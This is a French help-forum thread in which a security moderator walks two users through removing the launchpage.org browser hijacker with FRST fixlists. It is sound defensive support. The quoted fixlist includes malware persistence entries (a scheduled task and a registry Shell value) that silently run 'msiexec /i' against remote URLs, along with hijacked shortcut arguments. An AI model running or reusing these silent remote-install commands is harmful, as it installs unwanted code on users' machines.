Supprimer launchpage.org

Résolu/Fermé
christian - 6 juin 2017 à 22:39
 Stephanie - 27 juin 2017 à 14:51
Bonjour,

J'ai suivi le tuto sur le site et cela ne fonctionne pas, cette maudite page s'ouvre encore et encore...

Merci de votre aide

A voir également:

6 réponses

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
7 juin 2017 à 08:57
Salut,

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

0
les voici comme demandé, merci.


http://pjjoint.malekal.com/files.php?id=FRST_20170607_h10r12f5r7p15
http://pjjoint.malekal.com/files.php?id=20170607_k15u13k6j14k12
http://pjjoint.malekal.com/files.php?id=20170607_q5h11i15b7y8
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
7 juin 2017 à 22:38
Vas falloir arreter les cracks et compagnie
Ca ne te réussit pas.

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
Task: {578BF19C-8591-4D15-B9A3-A0C3B4F7E40F} - System32\Tasks\Microsoft\Windows\DeviceSettings\Grerqitherplerkck => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_94CRCM08TXX94CRCM08T&d=20170521 /q <==== ATTENTION
HKU\S-1-5-21-3236975695-3677505220-2588456723-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8cRUExF8Y5FTY2M8E5MdNQFkNWFTlSRWE1F8M3RUI1Rq== /q
HKU\S-1-5-21-3236975695-3677505220-2588456723-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06062017192922507\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8cRUExF8Y5FTY2M8E5MdNQFkNWFTlSRWE1F8M3RUI1Rq== /q
ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=oTlKBKjdhx0cXu%2FWfAUcY42ASVqxm5MUZws26fcLhkaUjq7gmXci3pNDgV9JpGoEoNQ%3D
2017-05-23 11:31 - 2017-05-23 11:44 - 00000000 ____D C:\Program Files (x86)\{D737C90D-3CD4-4BAC-9ED4-C55922080496}
2017-05-23 11:31 - 2017-05-23 11:31 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-21 03:06 - 2017-05-21 03:12 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Steganos VPN
2017-05-21 03:05 - 2017-05-22 22:48 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Steganos
2017-05-21 02:53 - 2017-05-21 02:53 - 00000000 ____D C:\Users\Admin\AppData\Local\mullvad
2017-05-21 02:52 - 2017-05-21 02:58 - 00000000 ____D C:\Program Files (x86)\Mullvad
2017-05-21 02:52 - 2017-05-21 02:55 - 00001094 _____ C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mullvad.lnk
2017-05-21 02:32 - 2017-05-23 20:28 - 00000000 ____D C:\Users\Admin\AppData\Roaming\slitherio
2017-05-21 02:32 - 2017-05-21 02:32 - 00000000 ____D C:\Users\Admin\AppData\Local\CrashRpt
2017-05-21 02:31 - 2017-05-23 20:19 - 00000000 ____D C:\Program Files (x86)\nz3vzYPKfU
2017-05-21 02:31 - 2017-05-22 21:38 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Vatege
2017-05-21 02:31 - 2017-05-21 02:33 - 00000000 ____D C:\Users\Admin\AppData\Local\Rejercult
2017-05-19 15:16 - 2017-05-19 15:16 - 01183744 _____ C:\WINDOWS\d61102b06ddebb9372c0b3ae96fcd5ea.exe
2017-05-19 15:16 - 2017-05-19 15:16 - 00051623 _____ C:\WINDOWS\uninstaller.dat
2017-06-02 15:07 - 2017-06-03 23:41 - 00000000 ____D C:\Program Files (x86)\Default Company Name
2017-06-02 12:44 - 2017-06-04 17:38 - 00000000 ____D C:\Users\Admin\Desktop\dorks
2017-06-01 10:31 - 2017-06-03 23:31 - 00000000 ____D C:\Users\Admin\AppData\Local\glory
2017-06-01 10:31 - 2017-06-01 10:31 - 00000000 ____D C:\Program Files (x86)\{89F9A552-E91A-4876-A597-360520C941B8}
2017-05-31 23:32 - 2017-05-31 23:32 - 00000000 ____D C:\Users\Admin\AppData\Local\UNP
2017-05-31 22:38 - 2017-06-06 15:56 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-31 22:38 - 2017-05-31 22:39 - 00000000 ____D C:\Program Files\UNP
2017-05-28 20:18 - 2017-06-02 13:55 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-05-27 14:51 - 2017-05-30 19:50 - 00000000 ____D C:\Users\Admin\AppData\Local\background_fault
2017-05-27 14:50 - 2017-05-27 14:50 - 00000000 ____D C:\Program Files (x86)\{6E29053C-A148-445D-ADBC-451042C16B78}
2017-05-06 16:38 - 2017-05-06 16:38 - 0000006 ____S () C:\ProgramData\7a4ab1ca1b9f1870d40f607d33e5639879927274
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.


2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
(ne pas utiliser zoek et faire une réinitialisation manuelle)

3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite


4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.



0
Bonjour J'ai le même soucis:(

https://pjjoint.malekal.com/files.php?id=20170625_11q10j146s9
https://pjjoint.malekal.com/files.php?id=FRST_20170625_j9g14d13v1410
https://pjjoint.malekal.com/files.php?id=20170625_b119i7p5w8

Merci d'avance
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
26 juin 2017 à 20:26
Salut,



Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Manuels Epson.lnk -> C:\Program Files (x86)\Epson Software\Epson Manual\Launcher\EPSMLAN.EXE (Seiko Epson Corporation) -> /LA "FR" /FR "DESKTOP"
ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
0
Stephanie > Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020
27 juin 2017 à 09:14
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 25-06-2017 01
Exécuté par Famille (27-06-2017 08:53:30) Run:1
Exécuté depuis C:\Users\Famille\Desktop
Profils chargés: Famille (Profils disponibles: UpdatusUser & Famille)
Mode d'amorçage: Normal
==============================================

fixlist contenu:

CreateRestorePoint:
CloseProcesses:
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Manuels Epson.lnk -> C:\Program Files (x86)\Epson Software\Epson Manual\Launcher\EPSMLAN.EXE (Seiko Epson Corporation) -> /LA "FR" /FR "DESKTOP"
ShortcutWithArgument: C:\Users\Famille\Desktop\Raccourcis bureau\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxps://launchpage.org/?uid=qTwwFKjsgxxsXUdPVEMboiPkpCfvUEThKRWATM2m7ZAUMpHyq9ziSR355dVM2tAu2w%3D%3D
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk => Raccourci argument supprimé(es) avec succès.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Famille\Desktop\Raccourcis bureau\Avast SafeZone Browser.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Famille\Desktop\Raccourcis bureau\Manuels Epson.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Famille\Desktop\Raccourcis bureau\Mozilla Firefox.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Famille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => Raccourci argument supprimé(es) avec succès.
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2720885648-2990538176-1464601800-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2720885648-2990538176-1464601800-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 7364608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 35226758 B
Java, Flash, Steam htmlcache => 748 B
Windows/system/drivers => 14226768 B
Edge => 803 B
Chrome => 0 B
Firefox => 312300588 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 3314 B
NetworkService => 49741824 B
UpdatusUser => 0 B
Famille => 114642344 B

RecycleBin => 0 B
EmptyTemp: => 508.8 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

Fin de Fixlog 08:54:46

0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628 > Stephanie
27 juin 2017 à 10:41
c'est mieux ?
0
Oui c'est parfait cette maudite page a enfin disparu .
Merci beaucoup
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
27 juin 2017 à 11:12
super =)


Supprime le dossier C:\FRST


Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
Evite les analyses et nettoyages réguliers ZHPCleaner, AdwCleaner, pas utile.

Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)

0
Je pense que c'est tout bon pour moi aussi :)
Mille mercis
0